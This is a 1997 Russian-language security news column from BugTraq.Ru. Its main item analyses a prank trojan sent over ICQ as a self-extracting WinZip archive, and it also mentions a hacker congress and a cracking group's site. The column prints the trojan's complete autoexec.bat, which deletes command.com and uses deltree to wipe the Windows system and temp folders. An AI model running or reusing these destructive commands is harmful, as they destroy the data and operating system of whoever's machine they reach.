BugTraq.Ru
Русский BugTraq
https://bugtraq.ru/review/archive/1997/30-12-97.html

30 декабря 1997, #5

Получил я на той неделе по ICQ некую программку - D&mD.exe, автор которой (UIN 5534022 с очень грамотным ником :) ) утверждал, что сие есть новый страшный вирус-мутант, который не ловится никакими сканерами, имеет чертовски сложную структуру и портит не только софт, но и хард - "Once activated, the person will have to buy a new computer!"

Поскольку до сих пор все мое знакомство с подобными штуками было ограничено слухами об ужасных утилитах, прожигающих монитор или снимающих стружку с жесткого диска, я заинтересовался. При ближайшем рассмотрении сей шедевр оказался банальным self-extracting WinZIP-файлом, в который были запакованы файлы autoexec.bat, 0.COM, BOOT.COM, SCREAMER.EXE и v.pif.

Дальше все было совсем просто - в 0.com лежали вызовы команд erase, copy и rename, сносящие и подменяющие основные (по мнению автора) файлы на компьютере жертвы. Дело завершало копирование заботливо подготовленного autoexec.bat:


	echo off

	c:\windows\boot.com

	erase c:\command.com

	erase c:\windows\screamer.exe

	erase c:\windows\boot.com

	echo Please wait while setup continues...

	rename c:\windows\system temporary

	deltree /y c:\windows\temporary

	deltree /y c:\windows\temp

	deltree /y c:\temporary

	cls

	1:

	echo HaHa!

	echo Your system has been FUCKED!!

	echo FUCK YOU FUCK YOU FUCK YOU FUCK YOU FUCK YOU FUCK YOU FUCK YOU

	goto 1

Как известно, WinZip Self Extractor позволяет подготовить архив, после распаковки которого будет автоматически запущена некая программа - обычно этим пользуются при упаковке дистрибутивов, но, как показала практика, этому можно найти и более веселое применение. Комментарии, думаю, излишни.


А в Гамбурге с 27 по 29 декабря проходил 14-й европейский хакерский конгресс (точнее, Chaos Communication Congress), который ежегодно устраивает Chaos Computer Club. Линки в основном для владеющих немецким, остальные могут получить лишь общее впечатление. Информацией поделился Werwolf, и я надеюсь на его более подробный рассказ об этом мероприятии.


На сайте хакерско-пиратской группы UCL представлены краткая история группы, странички некоторых ее членов, список последних достижений. FAQ для чайников:"Как ломать?", FAQ по взлому HASP. Сайт недавно подвергся переделке, улучшилось оформление, потерялась часть ссылок...


Напоследок - табличка по хакнутым в 1997 году сайтам. Больше всего не повезло доменам .com, .ru места в таблице не нашлось. Не было или никто об этом не знает ? Встретимся в следующем году. С наступающим!

«     »






  Copyright © 2001-2024 Dmitry Leonov Design: Vadim Derkach